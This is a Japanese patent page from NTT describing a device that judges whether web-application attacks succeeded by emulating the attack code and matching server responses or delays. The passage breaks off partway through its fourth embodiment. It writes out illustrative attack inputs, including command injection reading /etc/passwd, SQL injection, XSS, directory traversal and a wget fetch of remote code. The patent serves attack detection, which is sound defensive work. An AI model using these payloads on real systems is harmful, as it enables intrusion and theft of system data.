JP6708794B2 - 判定装置、判定方法、および、判定プログラム - Google Patents

判定装置、判定方法、および、判定プログラム Download PDF

Info

Publication number
JP6708794B2
JP6708794B2 JP2019529770A JP2019529770A JP6708794B2 JP 6708794 B2 JP6708794 B2 JP 6708794B2 JP 2019529770 A JP2019529770 A JP 2019529770A JP 2019529770 A JP2019529770 A JP 2019529770A JP 6708794 B2 JP6708794 B2 JP 6708794B2
Authority
JP
Japan
Prior art keywords
attack
code
server
feature
response
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
JP2019529770A
Other languages
English (en)
Other versions
JPWO2019013266A1 (ja
Inventor
楊 鐘本
楊 鐘本
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Nippon Telegraph and Telephone Corp
Original Assignee
Nippon Telegraph and Telephone Corp
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Nippon Telegraph and Telephone Corp filed Critical Nippon Telegraph and Telephone Corp
Publication of JPWO2019013266A1 publication Critical patent/JPWO2019013266A1/ja
Application granted granted Critical
Publication of JP6708794B2 publication Critical patent/JP6708794B2/ja
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Images

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/552Detecting local intrusion or implementing counter-measures involving long-term monitoring or reporting
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/554Detecting local intrusion or implementing counter-measures involving event detection and direct action
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/034Test or assess a computer or a system

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Computing Systems (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Description

本発明は、判定装置、判定方法、および、判定プログラムに関する。
webアプリケーションは多くのサービスで利用されている一方で、不特定多数からアクセス可能なため攻撃に晒されやすい性質を持つ。攻撃は、WAF(Web Application Firewall)、NIDS(Network-based Intrusion Detection System)等により検知することができるが、攻撃が成功したか否かについては大量のアラートを人手で調査・検証する必要がある。そこで、攻撃が成功したか否かを判定するため、HIDS(Host-based IDS)、Stateful IDS(非特許文献1〜3参照)、脆弱性情報との相関分析(非特許文献4参照)、攻撃コードのエミュレーション(非特許文献5参照)等の技術を用いることが考えられる。
しかし、HIDSの場合、サーバ内に導入することが必要となり、サーバで用いているシステムの改変が必要となる。また、Stateful IDSの場合、予め攻撃の挙動を定義する必要がある。さらに、脆弱性情報との相関分析を行う場合、予め脆弱性情報を収集する必要がある。また、攻撃コードのエミュレーション(特に、非特許文献5に記載の技術による攻撃コードのエミュレーション)は、x86等のバイナリコードのエミュレーションにしか対応できないため、webアプリケーションに対する攻撃には対応できない。そこで、本発明は、前記した問題を解決し、既存のシステムの改変や、攻撃の定義や脆弱性情報の収集を行うことなく、webアプリケーションに対する攻撃の成否を判定することを課題とする。
前記した課題を解決するため、本発明は、攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定装置であって、前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定部と、前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施し、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバからのレスポンスに現れる特徴を抽出する特徴抽出部と、前記判定の対象となる前記サーバからのレスポンスが、前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する判定部とを備えることを特徴とする。
本発明によれば、既存のシステムの改変や、攻撃の定義や脆弱性情報の収集を行うことなく、webアプリケーションに対する攻撃の成否を判定することができる。
図1は、第1の実施形態の判定装置の動作概要を説明する図である。 図2は、図1の判定装置の構成例を示す図である。 図3は、図2の攻撃タイプ別キーワードリストの例を示す図である。 図4は、図2の判定装置の処理手順を示すフローチャートである。 図5は、第2の実施形態の判定装置の動作概要を説明する図である。 図6は、図5の判定装置における攻撃コードの分割を例示する図である。 図7は、第3の実施形態の判定装置の動作概要を説明する図である。 図8は、外部リソースへのアクセス指示を含む攻撃リクエストを受信したwebサーバにおける、攻撃成功時の動作および攻撃失敗時の動作を説明する図である。 図9は、第4の実施形態の判定装置の動作概要を説明する図である。 図10は、各実施形態の判定装置を含むネットワークの構成例を示す図である。 図11は、判定プログラムを実行するコンピュータを示す図である。
以下、図面を参照しながら、本発明の実施形態を説明する。本発明は本実施形態に限定されない。なお、以下の説明において、攻撃コードによるwebサーバへの攻撃とは、例えば、攻撃コードによるwebサーバのwebアプリケーションへの攻撃であるものとする。
[第1の実施形態]
[概要]
図1を用いて、第1の実施形態の判定装置10の動作概要を説明する。まず、判定装置10は、例えば、図1に示すように、webアプリケーション(webサーバ)への攻撃リクエスト((1))を受信すると、この攻撃リクエストに含まれる攻撃コードと、攻撃タイプとを特定する。そして、判定装置10は、特定した攻撃タイプ(例えば、A.OS(Operating System)コマンドを悪用する攻撃タイプ)に応じたエミュレータで攻撃コードを実行し、実行の結果のwebサーバから出力される情報を攻撃の成功時に出力される特徴(例えば、「root:*:0:/bin/sh…」)として抽出する((2))。
その後、判定装置10は、webサーバからのレスポンス((3))を検査し、そのレスポンスに、(2)で抽出した特徴(例えば、「root:*:0:/bin/sh」)が含まれている場合、攻撃は成功と判定する((4)検査結果 攻撃は成功)。
このようにすることで、判定装置10は、既存のシステムの改変や、攻撃の定義や脆弱性情報の収集を行うことなく、webアプリケーションに対する攻撃の成否を判定することができる。
[構成]
次に、図2を用いて判定装置10の構成を説明する。判定装置10は、記憶部11と、攻撃検知部121と、攻撃タイプ判定部122と、攻撃コード解析部(特徴抽出部)123と、特徴選定部124と、特徴検査部(判定部)125とを備える。
記憶部11は、攻撃タイプ別キーワードリスト111と、特徴候補DB(データベース)112と、レスポンスDB113と、特徴DB114とを記憶する領域を備える。
攻撃タイプ別キーワードリスト111は、攻撃タイプごとに、当該攻撃タイプの攻撃コードに含まれるキーワードを示した情報である。この攻撃タイプ別キーワードリスト111は、攻撃タイプ判定部122が、攻撃コードに含まれるキーワードから攻撃タイプを判定する際に参照される。
なお、攻撃タイプは、例えば、A.OSコマンドを悪用する攻撃タイプ、B.プログラムコードを悪用する攻撃タイプ、C.SQLコマンド(DBの機能)を悪用する攻撃タイプ(例えば、SQL Injection等)、D.HTTPレスポンスを悪用する攻撃タイプ(例えば、XSS、Header Injection等)、E.ファイル操作を悪用する攻撃タイプ(例えば、ディレクトリトラバーサル等)の5つのタイプに分けられる。
なお、図3に例示するように、上記のA.の攻撃タイプではOSコマンドの名前をキーワードとする。また、B.の攻撃タイプではプログラミング言語で利用する固有表現をキーワードとする。例えば、PHPであればprint_r、var_dump、base64_decode等のPHPに固有の関数あるいはPHPの固有表現等($_GET、$_POST等)をキーワードとする。その他のプログラミング言語(Java(登録商標)、Perl、Ruby、Python等)においても同等である。そのため、B.の攻撃タイプではプログラミング言語毎に攻撃タイプ別キーワードリストを保持している。このとき、どのプログラミング言語に当たるかの情報は、例えば、図3に示すように、サブ攻撃タイプとして保持する。
また、C.の攻撃タイプではSQLコマンドの名前(select、update、insert、drop等)やDBアクセスの際の特徴的な表現をキーワードとする。例えば、MySQLの場合、information_schema、@@version、mysql等である。さらに、D.の攻撃タイプではHTMLやJavascript(登録商標)で利用される固有表現(alert(、onclick等)をキーワードとする。また、E.の攻撃タイプではディレクトリトラバーサル攻撃で利用される固有表現(../等)をキーワードとする。
図2の説明に戻る。特徴候補DB112は、攻撃コード解析部123よる攻撃コードのエミュレーションの結果、webサーバから出力された情報(特徴候補)を記憶する。
レスポンスDB113は、様々なwebアプリケーション(webサーバ)からのレスポンスを記憶する。このレスポンスDB113は、特徴選定部124が、特徴候補から、通常のレスポンスに頻繁に登場する語(普遍的な語)を除外する際に参照される。レスポンスDB113は、例えば、攻撃が来ないことが保証されている試験環境でレスポンスを取得して作成される。あるいは、攻撃検知部121で検知されなかったリクエストに対応するレスポンスを用いて作成される。
特徴DB114は、攻撃コードによる攻撃の成功時にwebサーバから出力される特徴を記憶する。具体的には、特徴DB114は、特徴候補DB112に記憶される特徴候補の中から特徴選定部124により選定された特徴を記憶する。この特徴DB114に記憶される特徴は、特徴検査部125が、webサーバからのレスポンスに基づき、攻撃が成功したか否かを判定する際に参照される。
攻撃検知部121は、webサーバへのリクエストが攻撃か否かの判定(攻撃検知)を行う。攻撃検知のアルゴリズムは、既存のシグネチャ検知のアルゴリズム(例えば、Snort(https://www.snort.org/)や、Bro(https://www.bro.org/))や、異常検知のアルゴリズム(例えば、Detecting Malicious Inputs of Web Application Parameters Using Character Class Sequences, COMPSAC, 2015)を用いてよい。
なお、ここでは、攻撃検知部121が処理対象とするリクエストにおけるURLエンコードやHTMLエンコードはデコード済みであるとする。例えば、リクエストが「GET /index.php?id=1234%3Bcat%20%2Fetc%2Fpasswd%3B」である場合、「GET /index.php?id=1234;cat /etc/passwd;」にデコード済であるものとする。
また、リクエストにおける攻撃コードの部分は、上記の既存のシグネチャ検知や異常検知のアルゴリズムにより出力されるものとする。例えば、リクエストが「GET /index.php?id=1234;cat /etc/passwd;」である場合、上記のアルゴリズムにより、上記のリクエストの攻撃コードの部分である「1234;cat /etc/passwd;」が出力されるものとする。
攻撃タイプ判定部122は、攻撃検知部121により攻撃と判定されたリクエストに含まれる攻撃コードに対して攻撃タイプの判定を行う。
ここで、攻撃タイプ判定部122は、例えば、webアプリケーションに対する攻撃の中でも特に重要と思われる、5つの攻撃タイプ(上記のA.〜E.の攻撃タイプ)のいずれであるかを判定する。ここでの攻撃タイプの判定は、攻撃コードに含まれるキーワードが、攻撃タイプ別キーワードリスト111(図3参照)に示されるどの攻撃タイプのキーワードとマッチするかにより行われる。
例えば、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、攻撃コードに「cat」が含まれていれば、当該攻撃コードをA.の攻撃タイプ(OSコマンドを悪用する攻撃タイプ)と判定する。また、攻撃タイプ判定部122は、攻撃コードに「print_r」が含まれていれば、当該攻撃コードをB.の攻撃タイプ(プログラムコードを悪用する攻撃タイプ)であり、その中でもphpを用いた攻撃タイプであると判定する。
なお、攻撃タイプ判定部122は、攻撃コードが、攻撃タイプ別キーワードリスト111(図3参照)に示される複数の攻撃タイプのキーワードとマッチした場合、例えば、攻撃コードの最初(攻撃コード内で最も左の位置)に出現したキーワードの攻撃タイプであると判定する。
一例を挙げると、攻撃コードが「;php -e “$i=123456789;var_dump($1)”;」の場合、攻撃タイプ別キーワードリスト111において、A.の攻撃タイプのキーワードである「php」と、B.の攻撃タイプのキーワードである「var_dump」とが出現する。このような場合、攻撃タイプ判定部122は、上記の攻撃コードにおいて「php」の方が「var_dump」よりも初めに出現しているので、A.の攻撃タイプと判定する。
なお、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、攻撃コードがどの攻撃タイプともマッチしなかった場合は判定不可とする。
攻撃コード解析部123は、攻撃コードについてエミュレータを用いた動的解析を行うことにより、当該攻撃コードを実行した際にwebサーバからのレスポンスに現れる特徴(出力)を抽出する。
具体的には、攻撃コード解析部123は、攻撃タイプ判定部122で判定された攻撃コードの攻撃タイプに応じたエミュレータを用いて、当該攻撃コードによるwebアプリケーションへの攻撃のエミュレーションを実施する。そして、攻撃コード解析部123は、攻撃コードのエミュレーションにおいて攻撃に対するレスポンスに現れる出力を、攻撃の成功時に現れる特徴候補として抽出する。
なお、上記の各攻撃タイプに応じたエミュレータは、例えば、デバッガやインタープリタを応用して事前に作成しておき、攻撃コード解析部123は、事前作成されたエミュレータから、攻撃タイプに応じたエミュレータを選択する。
攻撃コード解析部123は、例えば、以下のようにして攻撃コードを実行した際のリクエストに対するレスポンスに現れる特徴(出力)を抽出する。
例えば、攻撃コードの攻撃タイプがA.OSコマンドを悪用する攻撃タイプである場合、攻撃コード解析部123は、OSコマンドを実行できる環境(例えば、Windows(登録商標)のコマンドプロンプト、Linux(登録商標)のbash、あるいはコマンドをエミュレートできるエミュレータ)を用いて、当該攻撃コードをコマンドとして実行する。
一例を挙げると、攻撃コード解析部123は、「bash -c "cat /etc/passwd;”」というように、bashコマンドに-c引数で指定したコマンドを実行させる。そして、攻撃コード解析部123は、コマンドの実行による標準出力、標準エラー出力の内容を特徴候補として抽出する。例えば、攻撃コード解析部123は、攻撃コード「cat /etc/passwd;」に対し、標準出力:「root:*:0:/bin/sh …」、標準エラー出力「なし」という情報を特徴候補として抽出する。
また、例えば、攻撃コードの攻撃タイプが、B.プログラムコードを悪用する攻撃タイプである場合、攻撃コード解析部123は、プログラミング言語に対して適切なインタープリタあるいはエミュレータを用いて、当該攻撃コードを実行する。
一例を挙げると、攻撃コードが、phpコードの場合、攻撃コード解析部123は、「php -r ”print(‘123456789’);die();”」というように、phpインタープリタに-r引数で指定したコードを実行させる。また、攻撃コードがpythonコードの場合、攻撃コード解析部123は、「python -c “import sys;print 123456789;sys.exit()”」というように、pythonインタープリタに-c引数で指定したコードを実行させる。
そして、攻撃コード解析部123は、コードの実行後、標準出力、標準エラー出力の内容を特徴候補として抽出する。例えば、phpコードの場合、攻撃コード「print(‘123456789’);die();」に対し、標準出力「123456789」、標準エラー出力「なし」という情報を特徴候補として抽出する。
また、攻撃コードの攻撃タイプが、C.SQLコマンド(DBの機能)を悪用する攻撃タイプ(例えば、SQL Injection等)である場合、攻撃コード解析部123は、DBに対してSQL文を実行できるターミナルあるいはエミュレータを用いて、当該攻撃コードを実行する。
なお、SQL Injection攻撃によって挿入されるSQL文(SQLコマンド)は部分的なものであり、そのままでは実行できない。よって、攻撃コード解析部123は、SQL文の整形を行う。例えば、攻撃コード解析部123は、SQL文のSELECT句等より前の部分を消去することにより、SQL文をSELECT句等が攻撃コードの最初に現れるように変更する。なお、攻撃コード解析部123が、SQL文の句のうち、最初に現れるように調整するキーワードはSELECT句以外の句(例えば、update、delete、drop等の句)であってもよく、これらの句は攻撃タイプ別キーワードリスト111(図3参照)で与えられているものとする。
攻撃コード解析部123は、整形後のSQL文の実行による標準出力、標準エラー出力の内容を特徴候補として抽出する。例えば、攻撃コード解析部123は、攻撃コード「’ union select 123456789 -」を「select 123456789」に整形する。そして、攻撃コード解析部123は、整形後の攻撃コードの実行による標準出力「123456789」、標準エラー出力「なし」という情報を特徴候補として抽出する。
また、攻撃コードの攻撃タイプが、D.HTTPレスポンスを悪用する攻撃タイプ(例えば、XSS、Header Injection等)である場合、攻撃コード解析部123は、攻撃の性質上、攻撃コードそのものがレスポンスとしてクライアントに送られるため、攻撃コードそのものを特徴候補として抽出する。
例えば、攻撃コードがXSSによる攻撃コード「<script>alert(1)</script>」である場合、攻撃コード解析部123は、「<script>alert(1)</script>」を特徴候補として抽出する。また、攻撃コードがHeader Injectionによる攻撃コード「\r\nSet-Cookie:1234;」である場合、攻撃コード解析部123は、「\r\nSet-Cookie:1234;」を特徴候補として抽出する。
また、攻撃コードの攻撃タイプが、E.ファイル操作を悪用する攻撃タイプ(例えば、ディレクトリトラバーサル等)である場合、攻撃コード解析部123は、攻撃コードに現れるファイル名をOS内で検索し、そのファイル名のファイルの内容を特徴候補として抽出する。
例えば、攻撃コードが「../../../../etc/passwd」である場合、攻撃コード解析部123は、OS内から検索された、当該攻撃コードに現れるファイル名のファイルの内容である「root:*:0:/bin/sh …」を特徴候補として抽出する。
このようにすることで、攻撃コード解析部123は、攻撃コードの攻撃タイプに応じたエミュレーションを実行し、当該攻撃コードによる攻撃の成功時の特徴(特徴候補)を抽出することができる。なお、攻撃コード解析部123により抽出された特徴候補は特徴候補DB112に記憶される。
特徴選定部124は、攻撃コード解析部123により抽出された特徴候補の中から、特徴としては不適切な候補を除外する。具体的には、特徴選定部124は、特徴候補DB112に記憶される特徴候補の中から、普遍的過ぎて攻撃の成否の判定に利用できない可能性の高い特徴候補を除外する。
例えば、特徴選定部124は、特徴候補DB112に記憶される特徴候補のうち、文字列長が極端に短い(例えば、文字列長が2以下の)特徴候補を除外し、その後、通常のレスポンスにも現れる普遍的な語の特徴候補を除外し、残った特徴候補を攻撃成功時の特徴として、特徴DB114に記憶する。
例えば、特徴選定部124は、特徴候補「1、2、title、page、123456789」の中から、文字列長が所定値(例えば、2)以下の特徴候補「1、2」を除外する。その後、特徴選定部124は、文字列長が所定値(例えば、2)以下の特徴候補を除外した「title、page、123456789」から普遍的な語を除外する。
ここでの普遍的な語は、例えば、攻撃でないリクエストに対するレスポンスに含まれる語であるものとする。従って、特徴選定部124は、攻撃でないリクエストに対するレスポンスの集合であるレスポンスDB113を参照して、特徴候補「title、page、123456789」のうち、レスポンスDB113における出現回数が1以上の特徴候補を除外する。そして、特徴選定部124は、除外の結果の残った特徴候補を攻撃成功時の特徴として、特徴DB114に記憶する。
一例を挙げる。ここでは、レスポンスDB113にレスポンス「<html><title>My blog page</title><p>Hello world ! Date : 2017/4/1</p></html>」が記憶されている場合を考える。この場合、特徴選定部124は、特徴候補「title、page、123456789」のうち、当該レスポンスに出現する特徴候補「title、page」を除外する。そして、特徴選定部124は、除外の結果の残った特徴候補「123456789」を攻撃成功時の特徴として、特徴DB114に記憶する。
このようにすることで、特徴選定部124は、特徴候補DB112から、普遍的な語を除外する際、レスポンスDB113を用いることとしたが、予め用意された普遍的な語のリストを用いることとしてもよい。
また、特徴選定部124は、攻撃コード解析部123により抽出された特徴候補に対し、上記のように、文字列長が極端に短い特徴候補の除外と、普遍的な語の特徴候補の除外とを行ってもよいし、いずれか一方のみを行ってもよい。
特徴検査部125は、特徴DB114を参照して、webサーバからのレスポンスが攻撃の成功を示すものか否かを判定する。つまり、特徴検査部125は、当該レスポンスに、特徴DB114に記憶される特徴が含まれる場合、攻撃が成功したと判定する。一方、特徴検査部125は、当該のレスポンスに、特徴DB114に記憶される特徴が含まれない場合、攻撃は失敗したと判定する。そして、特徴検査部125は、攻撃の成否(成功/失敗)の判定結果を出力する。
以上説明した判定装置10によれば、既存のシステムの改変や、攻撃の定義や脆弱性情報の収集を行うことなく、webアプリケーションに対する攻撃の成否を判定することができる。
[処理手順]
次に、図4を用いて、判定装置10の処理手順を説明する。まず、判定装置10の攻撃検知部121は、webアプリケーションへのリクエストが攻撃か否かを判定する(S1)。ここで、当該リクエストが攻撃であれば(S1でYes)、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、当該リクエストに含まれる攻撃コードの攻撃タイプを判定する(S2)。攻撃タイプ判定部122が攻撃タイプを判定可能な場合(S3でYes)、攻撃コード解析部123は判定された攻撃タイプに基づき、攻撃コードのエミュレーションを実行し、実行の結果出力された情報を、攻撃成功時の特徴候補として抽出する(S4:攻撃コード解析)。なお、S1において攻撃検知部121がwebアプリケーションへのリクエストは攻撃ではないと判定した場合(S1でNo)、処理を終了する。
S4の後、特徴選定部124は、S4で抽出された特徴候補の中から、特徴としては不適切な特徴候補(例えば、普遍的な語)を除外した特徴候補を、攻撃の成否の判定に用いる特徴として選定する(S5:特徴選定)。この攻撃の成否の判定に用いる特徴は、例えば、特徴DB114に記憶される。
S5の後、特徴DB114に特徴が存在すれば(S6でYes)、特徴検査部125は、特徴DB114に記憶される特徴と、攻撃の成否の判定対象となるwebアプリケーションからのレスポンスとを照合することにより、攻撃が成功したか否かを判定する(S7:特徴検査)。つまり、特徴検査部125は、当該レスポンスに、特徴DB114に記憶される特徴が含まれている場合、当該webアプリケーションへの攻撃が成功したと判定し、当該レスポンスに、特徴DB114に記憶される特徴が含まれていない場合、当該webアプリケーションへの攻撃は失敗したと判定する。
S7の特徴検査において、特徴検査部125が、攻撃は成功したと判定した場合(S8でYes)、攻撃は成功したとして、外部装置等に通知し(S9)、攻撃は失敗したと判定した場合(S8でNo)、攻撃は失敗したとして、外部装置等に通知する(S10)。
なお、S3において攻撃タイプ判定部122が攻撃タイプの判定不可能な場合(S3でNo)、あるいは、S6において特徴DB114に特徴が存在しないと判定された場合(S6でNo)、判定装置10は、攻撃の成否判定は不可として、外部装置等に通知する(S11)。
このような判定装置10によれば、既存のシステムの改変や、攻撃の定義や脆弱性情報の収集を行うことなく、webアプリケーションに対する攻撃の成否を判定することができる。
[第2の実施形態]
判定装置10は、webサーバへのリクエストに含まれる攻撃コードを部分的に分割した攻撃コード(部分攻撃コード)を実行した際の出力についても、攻撃成功時の特徴(また特徴候補)としてもよい。この場合の判定装置10を、第2の実施形態の判定装置10aとして説明する。前記した実施形態と同じ構成については同じ符号を付して説明を省略する。
図5を用いて、判定装置10aの動作概要を説明する。例えば、判定装置10aは、webサーバへの攻撃リクエスト「GET /index.php?id=1); cat /etc/passwd」を受信した場合((1))、攻撃コード「1); cat /etc/passwd」について、部分攻撃コード「1); cat /etc/passwd」、「); cat/etc/passwd」、「; cat /etc/passwd」、「cat /etc /passwd」、…を抽出する。
そして、判定装置10aは、攻撃コード「1); cat /etc/passwd」の攻撃タイプを「A.OSコマンドを悪用する攻撃タイプ」と判定すると、各部分攻撃コードについて、当該攻撃タイプに応じたエミュレーションにより、webアプリケーションから出力される標準出力(例えば、「root:*:0:/bin/sh …」)を、部分攻撃コードによる攻撃成功時の特徴として抽出する((2))。そして、判定装置10aは、webサーバからのレスポンス((3))に、当該特徴(例えば、「root:*:0:/bin/sh …」)が含まれていた場合、攻撃が成功したと判定する((4))。
このようにすることで、判定装置10aは、例えば、webサーバやwebアプリケーションの仕様により、所定の条件下で攻撃が成功するような攻撃コードについても、当該攻撃コードによる攻撃の成功時の特徴を抽出することができる。
なお、攻撃コードの分割の方法は、例えば、(1)攻撃コードの文字、記号を先頭から1つずつ消去する、または(2)攻撃コードの先頭から連続する同じ文字クラス(例えば、数字、アルファベット、空白等)を消去する方法等がある。
図6を用いて、(2)攻撃コードの先頭から順に連続する同じ文字クラス(例えば、数字、アルファベット、空白等)を消去する方法について説明する。文字クラスの定義は、例えば、図6の右側に示すように正規表現等によって定義されているものとする。
ここでは、攻撃コードが「1234);echo 123456789;」である場合を考える。この場合、当該攻撃コードの先頭から順に連続する同じ文字クラス(例えば、数字、アルファベット、空白等)を消去し、「1234);echo 123456789;」、「);echo 123456789;」、「;echo 123456789;」、「echo 123456789;」、「123456789;」、「;」という部分攻撃コードを得る。なお、上記の攻撃コードの分割は、例えば、判定装置10aの攻撃コード解析部123により行われる。
その後、攻撃コード解析部123は、これらの部分攻撃コードそれぞれのエミュレーションを実行し、webアプリケーションからの標準出力/標準エラー出力として、図6に示す出力を得る。そして、攻撃コード解析部123は、これらの出力のうち、標準出力である「-bash: syntax error near unexpected token」、「123456789」、「-bash: 123456789: command not found」を、特徴候補として抽出する。
その後、特徴選定部124は、攻撃コード解析部123により抽出された特徴候補から、特徴として用いるものを選定し、特徴検査部125は、検査対象となるレスポンスに対し、当該特徴を用いて、攻撃が成功したか否かを判定する。
このような判定装置10aによれば、例えば、webサーバやwebアプリケーションの仕様により、所定の条件下で攻撃が成功するような攻撃コードについても、攻撃が成功したか否かを判定することができる。
[第3の実施形態]
判定装置10は、webサーバにおける攻撃リクエストに対するレスポンス処理時間の長さにより、攻撃が成功したか否かを判定してもよい。この場合の判定装置10を第3の実施形態の判定装置10bとして説明する。前記した実施形態と同じ構成については同じ符号を付して説明を省略する。
ここでは、webサーバへのリクエストに、例えば、A.OSコマンドを悪用する攻撃タイプの「GET /index.php?id=sleep 10;」という攻撃コードや、C.SQLコマンド(DBの機能)を悪用する攻撃タイプの「GET /index.php?id=1’ union select sleep(10) --」という攻撃コード等が用いられた場合を考える。
上記のようにリクエストの攻撃コードに上記のsleep等、webサーバにおける動作時刻を操作する機能が用いられた場合、webサーバはリクエスト受信後、上記のsleep等で指定された時間(例えば10秒)経過した後で、レスポンスを送信する。
したがって、判定装置10bは、webアプリケーションへのリクエストに上記のsleep等、時刻を操作する機能(例えば、関数やコマンド)を含む攻撃コードが含まれていた場合、当該webアプリケーションへのリクエストの送信から、当該リクエストに対するレスポンスの受信までの時間(リクエスト処理時間)を計測する。そして、判定装置10bは、このリクエスト処理時間が所定時間以上であったとき、攻撃が成功したと判定し、リクエスト処理時間が所定時間未満であったとき、攻撃に失敗したと判定する。
このようにすることで、判定装置10bは、上記のsleep等、時刻を操作する機能(例えば、関数やコマンド)を含む攻撃コードによる攻撃についても、当該攻撃が成功したか否かを判定することができる。
図7を用いて、判定装置10bの動作例を説明する。判定装置10bは、webサーバへの攻撃リクエストに上記のsleepを含む攻撃コードが含まれていた場合((1))、攻撃コード解析部123は、当該攻撃コードの攻撃タイプに応じたエミュレーションを行い、攻撃コード(例えば、select sleep())と、当該攻撃コードの実行により生じるリクエスト処理時間(例えば、select sleep()に設定される時間=10秒)とを対応付けた情報を、webサーバへの攻撃成功時の特徴として、特徴DB114に記憶する((2))。
その後、判定装置10bの特徴検査部125は、webサーバから、(1)で送信された攻撃リクエストに対するレスポンスを受信すると((3))、当該webサーバのリクエスト処理時間に、(2)で記憶した攻撃成功時の特徴があるか否かを判定する。つまり、特徴検査部125は、当該webサーバにおけるリクエスト処理時間が10秒以上か否かを判定する。
具体的には、(3)のレスポンスの送信時刻2017/4/1 00:00:11と、(1)のリクエストの送信時刻2017/4/1 00:00:00との差から、当該webサーバにおけるリクエスト処理時間を算出する。算出の結果、webサーバにおけるリクエスト処理時間は11秒(10秒以上)なので、特徴検査部125は、リクエストの検査の結果、攻撃は成功と判定する((4))。
このような判定装置10bによれば、例えば、sleep等、時刻を操作する機能(例えば、関数やコマンド)を含む攻撃コードによる攻撃についても、攻撃が成功したか否かを判定することができる。
[第4の実施形態]
なお、攻撃コードの中には、攻撃コード本体が外部リソースにある場合もある。このような場合、攻撃コードは、攻撃先を攻撃コード本体のある外部リソースへ誘導するアクセス指示を含む。したがって、例えば、図8に示すように、外部リソースへのアクセスを指示する攻撃コードを含む攻撃リクエストを受信したwebサーバは、攻撃成功時には、当該外部リソースへのアクセスを実行する。一方、攻撃失敗時には、webサーバは、当該外部リソースへのアクセスを実行しない。
したがって、判定装置10は、webサーバへの攻撃リクエストに含まれる攻撃コードに、外部リソースへのアクセス指示が含まれている場合、webサーバから当該外部リソースへのアクセスがあったか否かにより、攻撃が成功したか否かを判定してもよい。この場合の判定装置10を第4の実施形態の判定装置10cとして説明する。前記した実施形態と同じ構成については同じ符号を付して説明を省略する。
このような判定装置10cの攻撃コード解析部123は、攻撃コードのエミュレーションの結果、当該攻撃コードの実行により外部リソースへのアクセスがあったことを検知した場合、当該攻撃コードの実行により外部リソースへのアクセスがあったことをwebサーバへの攻撃成功時の特徴として抽出する。
そして、特徴検査部125は、上記の攻撃成功時の特徴に基づき、攻撃リクエストの送信先のwebサーバへの攻撃が成功したか否かを判定する。例えば、特徴検査部125は、webサーバが外部リソースへのアクセスを指示する攻撃コードを含む攻撃リクエストを受信したことを検知すると、webサーバが、攻撃リクエストの受信から所定時間以内に当該外部リソースへアクセスしたか否かを判定する。ここで、特徴検査部125は、webサーバが、攻撃リクエストの受信から所定時間以内に当該外部リソースへアクセスしたと判定した場合、攻撃は成功したと判定する。一方、特徴検査部125は、webサーバが、攻撃リクエストの受信から所定時間以内に当該外部リソースへアクセスしなかったと判定した場合、攻撃は失敗したと判定する。
なお、webサーバから、攻撃コードに指定された外部リソースへのアクセスの有無は、例えば、判定装置10cまたはネットワーク上に設置されるネットワーク監視装置(図示省略)による当該webサーバからのアクセスの監視結果に基づき判定される。
図9を用いて、判定装置10cの動作例を説明する。ここでは、webサーバへの攻撃リクエストが、A.OSコマンドを悪用する攻撃タイプの「GET /index.php?id=wget http://download/x.php」である場合を考える。
